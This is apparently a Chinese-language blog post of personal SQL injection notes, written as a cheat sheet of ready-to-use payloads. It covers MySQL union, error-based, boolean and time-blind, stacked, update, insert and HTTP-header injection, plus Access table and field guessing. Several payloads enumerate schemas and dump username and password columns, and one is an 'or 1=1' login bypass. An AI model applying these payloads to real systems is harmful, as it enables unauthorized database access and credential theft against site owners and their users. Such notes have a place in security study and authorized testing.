SQL注入式攻击 手工语句笔记

========MySQL数据库

SQL查询语句

- 获取数据库信息
    select user(),version(),database(),@@datadir,@@version_compile_os

- 获取数据库名字
    select schema_name from schemata;
    select schema_name from information_schema.schemata;
    select group_concat(distinct table_schema) from tables;
    select group_concat(distinct table_schema) from information_schema.tables;

- 获取数据库表名字
    select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
    select group_concat(distinct table_name) from information_schema.tables where table_schema=database();

- 获取字段名
    select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';

- 获取字段内容
    select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;

联合查询注入

判断注入(略)、判断字段(列)数
    union select 
    order by
查看回显位
    union select 1,2,3,4,……

获取数据库信息,假设回显位为1,2
    union select version(),user(),3%23

获取数据库名字
    union select null,schema_name,null from information_schema.schemata%23
    union select 1,schema_name,3 from information_schema.schemata%23
    union select null,group_concat(schema_name),null from information_schema.schemata%23

获取数据库表
    union select null,group_concat(table_name),null from information_schema.tables%23//获取所有数据库表
    union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23//获取指定的数据库zaqtest的表
    union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23//获取当前web系统的数据库的表

获取users字段字段名
    union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23

获取字段内容
    union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23

报错注入

    and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
    and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
    and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
    and exp(~(select * from(select user())a))
    (!(select * from (select user())x) - ~0)

布尔盲注

    and if(mid(user(),1,1),1,0)
    and if(mid(user(),1,1)='r',1,0)
    and (select user() like 'r%' from tables limit 0,1)

时间盲注

    and if(1=1,sleep(3),1)

堆叠查询

    okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';

update注入

    update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
    update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk' 

insert 注入

    insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');

http头注入

在HTTP头中这几个是常见存在注入点的地方:
    X-Forwarded-For
    Host
    User-agent
    Referer

    X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
    insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')

万能密码

    or 1=1    

========ACCESS数据库

1.报错信息:

    and exists(select * from MSysAccessObiects)

    and (select count(*) from sysobjects)>0
    and (select count(*) from msysobjects)>0

2.猜表:

    and exists(select * from tables) #返回正常说明表存在!

3.猜字段和字段内容

(1)猜字段数

    order by 5
    union select 1,2,3,4...

    接着猜字段数: order by 3
    假设猜到字段数是3 然后查看回显位: union select 1,2,3

(2)猜字段名

    先猜字段名: 
        and exists(select username from admin) #返回正常表示 username 存在
        and exists(select password from admin) #返回正常表示 password 存在
    二分法猜字段长度和内容:
        猜长度:
            and (select top 1 len(username) from admin)>30    //error
            and (select top 1 len(username) from admin)<30    //True,接着二分法
        猜内容:
            and (select top 1 ascii(mid(username,1,1))>97 from admin)    //true
            and (select top 1 ascii(mid(username,1,1))>114 from admin)    //error    
            证明admin表的第一个记录的username字段的第一个字母的ASCII码

  • 笔记记录,仅供参考! (^ * ^)

 Previous
sqlmap-tamper脚本分类翻译对照 sqlmap-tamper脚本分类翻译对照
sqlmap tamper简介sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 sqlmap tamper 脚本分类支持的数据库编号脚本名称作
Next 
sqlmap命令中文手册 sqlmap命令中文手册
用法:python sqlmap.py [选项] 选项: -h, –help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 –version